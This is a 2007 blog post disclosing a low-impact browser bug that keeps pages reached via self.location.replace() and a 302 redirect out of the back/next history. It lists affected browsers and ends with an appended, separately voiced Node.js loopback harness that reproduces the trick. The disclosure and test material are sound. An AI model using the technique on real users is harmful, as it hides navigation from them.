ush.it - a beautiful place

Shadowpage vulnerability: the page that doesn't exist (Multiple browsers affected)

May 7, 2007 at 12:15 pm - Filed under Hacks, Language EN

Yesterday I (Francesco `ascii` Ongaro) found a low-impact bug: basically, it is possible to make the user visit a page that is not listed in the back/next button history. The fun happens when self.location.replace() points to a page that issues an HTTP/1.x 302 Redirect + Location. Neither the initial page nor the redirect page will be listed.

Since the bug is really trivial, I feel that this amount of information plus a PoC is enough to put everybody in a position to fully understand the bug.

PoC: http://ascii.ush.it/hack-shadowpage/

Initially I believed that it was just a Mozilla Firefox bug but when I tested the PoC on other browsers it worked flawlessly. So again: it's not remote code execution but works on every browser I tried, and this makes it kinda cool.

Mozilla Firefox 1.5.0.11              (works)
Mozilla Firefox 2.0.0.3               (works)
GNOME Web Browser 2.16.2/Epiphany     (works)
Opera 9.20                            (works)
Microsoft Internet Explorer 7         (works)
Microsoft Internet Explorer 6         (works)
Microsoft Internet Explorer 5.5       (works)
Microsoft Internet Explorer 5         (works)
Konqueror 3.5.2                       (works)
Safari 2.0.4 (419.3)                  (works)
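
To repeat the test on a browser that is not in the list above, the setup described in the post (a page calling self.location.replace() on a URL that answers 302 + Location) can be served locally. This is an added example, not the original PoC; the file name, paths, port and page text are constructed for illustration.

```javascript
// Added example: local test harness, not the original PoC.
// File name, paths, port and page text are constructed for illustration.
const html = (body) => `<!doctype html><meta charset="utf-8">${body}`;

const PAGES = {
  // Step 1: an ordinary page, so the Back button has somewhere to return to.
  '/': html('<p>Start page.</p><a href="/launch">open /launch</a>'),
  // Step 2: replaces its own history entry with a URL that redirects.
  '/launch': html('<script>self.location.replace("/hop");</script>'),
  // Step 4: final page; shows how many entries the browser recorded.
  '/landing': html(
    '<p>Landing page. Press Back and note which page appears.</p>' +
    '<pre id="o"></pre><script>document.getElementById("o").textContent=' +
    '"history.length = " + history.length;</script>'),
};

// Maps a request URL to a response. Step 3 (/hop) is the 302 + Location.
function route(rawUrl) {
  const path = new URL(rawUrl, 'http://localhost').pathname;
  // no-store keeps cached copies from hiding the behaviour on repeat runs.
  const headers = { 'Cache-Control': 'no-store' };
  if (path === '/hop') {
    return { status: 302, headers: { ...headers, Location: '/landing' }, body: '' };
  }
  if (Object.prototype.hasOwnProperty.call(PAGES, path)) {
    return { status: 200, headers: { ...headers, 'Content-Type': 'text/html' },
             body: PAGES[path] };
  }
  return { status: 404, headers, body: 'not found' };
}

// Start with: node shadowpage.js --serve   (binds to loopback only)
if (process.argv.includes('--serve')) {
  import('node:http').then(({ createServer }) => {
    createServer((req, res) => {
      const r = route(req.url);
      res.writeHead(r.status, r.headers);
      res.end(r.body);
    }).listen(8080, '127.0.0.1', () => console.log('http://127.0.0.1:8080/'));
  });
}
```

Open the start page, follow the link, then press Back from the landing page and walk the history list to see which of /launch and /hop the browser kept.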